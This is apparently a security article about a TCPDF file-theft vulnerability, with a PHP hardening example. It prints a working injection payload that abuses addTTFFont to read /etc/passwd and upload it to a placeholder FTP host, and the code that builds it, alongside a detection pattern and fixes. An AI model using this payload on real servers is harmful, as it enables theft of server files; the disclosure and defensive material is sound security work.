Hackers use PDF generators to steal files from web servers
TCPDF is one of the most popular PHP libraries for creating PDF documents and one of the most widely used open source projects today. It serves millions of users every day, usually embedded in CMS platforms or other web applications. However, attackers can steal files from web servers by exploiting the TCPDF vulnerability described here.
Vulnerability exploitation scenarios
1. Alice is the owner of an online store. She sends each customer a PDF receipt showing the purchase details and buyer information.
2. An attacker named Chuck notices that Alice forgot to filter the data in the "customer name" field before writing it into the PDF document.
3. Chuck finds that he can place a crafted malicious payload in the "customer name" field of an order. When the PDF is generated, the payload is executed and files are stolen from Alice's online shop server.
Attack Process
Why does the scenario above work? The details are as follows:
Chuck enters the malicious payload in the "customer name" field. The payload instructs the PDF builder on Alice's server to add a font whose source is a file on the server itself and to write the resulting font file to Chuck's FTP server.
However, the PDF builder checks neither the so-called "font" file nor the address it is sent to. This vulnerability allows Chuck to steal any file on the server that is readable with the PHP process's permissions.
Understanding TCPDF
There are many ways to design a PDF with TCPDF. The most common is to create a simple HTML page and pass the HTML code to TCPDF. Common HTML tags, such as table, image, and header, are parsed and converted to PDF format.
However, a special tag, <tcpdf/>, is also enabled by default. It is a special element for calling methods of the TCPDF class. An example of the element is as follows:
<tcpdf method="MethodFromTCPDFClass" params="EscapedParamData" />
If this HTML element is passed to writeHTML and the TCPDF method "MethodFromTCPDFClass" exists, TCPDF executes that method with the supplied parameters.
In other words, if unchecked user data is passed to writeHTML, a user can covertly call any method of the TCPDF class. Some TCPDF methods can be abused by attackers.
Font Loading Method
The TCPDF class has a method named addTTFFont, described as: "It can convert fonts and add TrueType or Type1 fonts to the fonts folder". Of course, this can also be used to pack any readable file on the server and send it to any writable location, which can naturally be a remote server belonging to the attacker.
The addTTFFont method takes the following relevant parameters:
$fontfile: the path on the server of the file to be extracted (it need only be readable by PHP).
$fonttype: the font type; the attacker sets this to TrueType.
$outpath: the output location of the file; here the attacker enters an FTP address.
To generate the tcpdf element, the following code is used:
$params = TCPDF_STATIC::serializeTCPDFtagParameters(array('/etc/passwd','TrueType','',255,urldecode('ftp://user:pass@host/')));
The result is as follows:
<tcpdf method="addTTFFont" params="%5B%22%5C%2Fetc%5C%2Fpasswd%22%2C%22TrueType%22%2C%22%22%2C255%2C%22ftp%3A%5C%2F%5C%2Fuser%3Apass%40host%5C%2F%22%5D"/>
If this element can be injected into a PDF generated with TCPDF, the server reads the contents of the local /etc/passwd while parsing it and uploads them to the attacker's FTP server.
TCPDF Security
The first step is to upgrade TCPDF to the latest version. There is more than one fix, however. To address this vulnerability, we can also:
In php.ini, set allow_url_fopen to Off; and in config/tcpdf_config.php, set K_TCPDF_CALLS_IN_HTML to false.
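The receipt scenario above, written out as an added example (not code from the article or from the TCPDF project): the vulnerable concatenation beside the hardened version, a check that flags injection attempts, and the K_TCPDF_CALLS_IN_HTML constant defined before the library loads. It assumes TCPDF is installed through Composer (vendor/autoload.php); the sample customer name is constructed.

```php
<?php
// Disable <tcpdf method="..."> tag processing before TCPDF loads: its own
// config file only defines the constant if it is not already defined,
// so defining it here wins. Nothing in a receipt needs this feature.
define('K_TCPDF_CALLS_IN_HTML', false);
require_once __DIR__ . '/vendor/autoload.php'; // assumed Composer install

// Vulnerable pattern from the article: user data concatenated straight
// into the HTML that writeHTML will parse.
function receiptHtmlVulnerable(string $customerName, string $orderId): string
{
    return "<h1>Receipt #{$orderId}</h1><p>Customer: {$customerName}</p>";
}

// Hardened pattern: every user-controlled field is HTML-escaped, so a
// submitted "<tcpdf ...>" is rendered as literal text instead of being
// interpreted as a method call.
function receiptHtmlSafe(string $customerName, string $orderId): string
{
    $name = htmlspecialchars($customerName, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    $id   = htmlspecialchars($orderId, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<h1>Receipt #{$id}</h1><p>Customer: {$name}</p>";
}

// Detection: flag any input carrying a tcpdf tag so the attempt is logged
// and the order reviewed, independent of whether escaping is in place.
function looksLikeTcpdfInjection(string $value): bool
{
    return (bool) preg_match('/<\s*tcpdf\b/i', $value);
}

// Constructed sample input shaped like the article's payload (not a real order).
$customerName = '<tcpdf method="addTTFFont" params="..."/>';
$orderId      = '1001';

if (looksLikeTcpdfInjection($customerName)) {
    error_log("tcpdf tag found in customer name for order {$orderId}; flagged for review");
}

$pdf = new TCPDF();
$pdf->AddPage();
// Only the escaped HTML ever reaches writeHTML.
$pdf->writeHTML(receiptHtmlSafe($customerName, $orderId), true, false, true, false, '');
$pdf->Output(__DIR__ . '/receipt.pdf', 'F');
```

Escaping alone already neutralises the tag; the constant is defence in depth for any code path that forgets to escape, and the detection log gives the shop a record of the attempt.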